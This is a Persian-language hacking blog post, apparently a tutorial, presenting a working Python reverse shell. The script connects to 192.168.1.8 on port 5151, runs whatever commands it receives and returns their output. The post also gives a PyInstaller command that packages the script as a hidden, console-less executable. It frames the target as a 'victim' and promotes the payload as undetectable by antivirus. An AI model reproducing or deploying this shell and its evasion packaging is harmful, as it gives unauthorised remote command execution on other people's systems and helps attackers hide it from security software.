پایتون شل Python Shell

منتشر شده در دسته : راهکارهای هکر

پایتون شل چیست ؟ بهترین دوست شما در یک تست نفوذ پایتون است .. از زبان برنامه نویسی پایتون می‌توان به منظور ایجاد اکسپلوییت ها و ابزارهای مختلف استفاده کرد . دلایل زیادی مبنی بر این موضوع وجود دارد که چرا پایتون بهترین عمل‌کرد را دارد . اول از همه اینکه اسکریپت های پایتون به عنوان اپلیکیشن های سالم و عاری از آسیب‌پذیری در سیستم‌ها شناخته می‌شوند و به قول معروف در لیست سفید اپلیکیشن ها قرار دارند . دوم اینکه پایتون ساده است و شما بدون صرف زمان برنامه نویسی زیاد می‌توانید بهترین نتیجه را دریافت کنید . همچنین با استفاده از پایتون می‌توانید حالت‌های تصادفی زیادی را به سادگی اضافه کنید تا بر مشکل امضای برنامه‌ها در آنتی ویروس ها چیره شوید . و مورد آخر اینکه شما می‌توانید با استفاده از py2exe به سادگی یک اسکریپت پایتون را به یک فایل اجرایی exe تبدیل کنید .

پایتون شل (Python Shell)

ساده‌ترین شکل و نمونه برای ایجاد پایتون شل به صورت دستوری زیر می‌باشد :
ابزار ویرایشگر پایتون IDLE را باز کنید و اسکریپت زیر را در قالب یک فایل جدید وارد کنید . (در صورتی که به پایتون آشنایی ندارید می‌توانید کتاب آموزش سریع پایتون را مطالعه کنید) :

#!/usr/bin/python
import socket, subprocess
HOST=’192.168.1.8′
PORT=5151
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send(‘[*]Connection Established!’)
while 1:
data=s.recv(1024)
if data==’quit:break
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
stdout_value=proc.stdout.read()+proc.stderr.read()
s.send(stdout_value)
s.close()

پایتون شل Python Shell

زمانی که این کد در محیط پایتون اجرا می‌شود یک اتصال شل به صورت برگشتی به ماشینی با آدرس آیپی 192.168.1.8 ایجاد می‌کند . برای شنود می‌توانید از نتکت netcat بر روی پورت 5151 گوش کنید .

این شل معکوس یک خط فرمان بازگشتی شل را به من می‌دهد که از طریق این خط فرمان به سیستم قربانی دسترسی خواهید داشت . شما همچنین می‌توانید برای راحتی هر چه بیشتر کار از ابزار pyinstaller به منظور تبدیل فایل اسکریپت پایتون به یک فایل اجرایی exe استفاده کنیم :

C:\python27\python.exe
C:\utils\pyinstaller-2.0\pyinstaller.py –out=C:\shell\ –noconsole –onefile C:\shell\shell.py

در ضمن این اسکریپت توسط آنتی ویروس شناسایی نخواهد شد .

لیست دروس

خوشحال می شویم دیدگاههای خود را در میان بگذارید * فرصت پاسخگویی به سوالات در بلاگ وجود ندارد

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *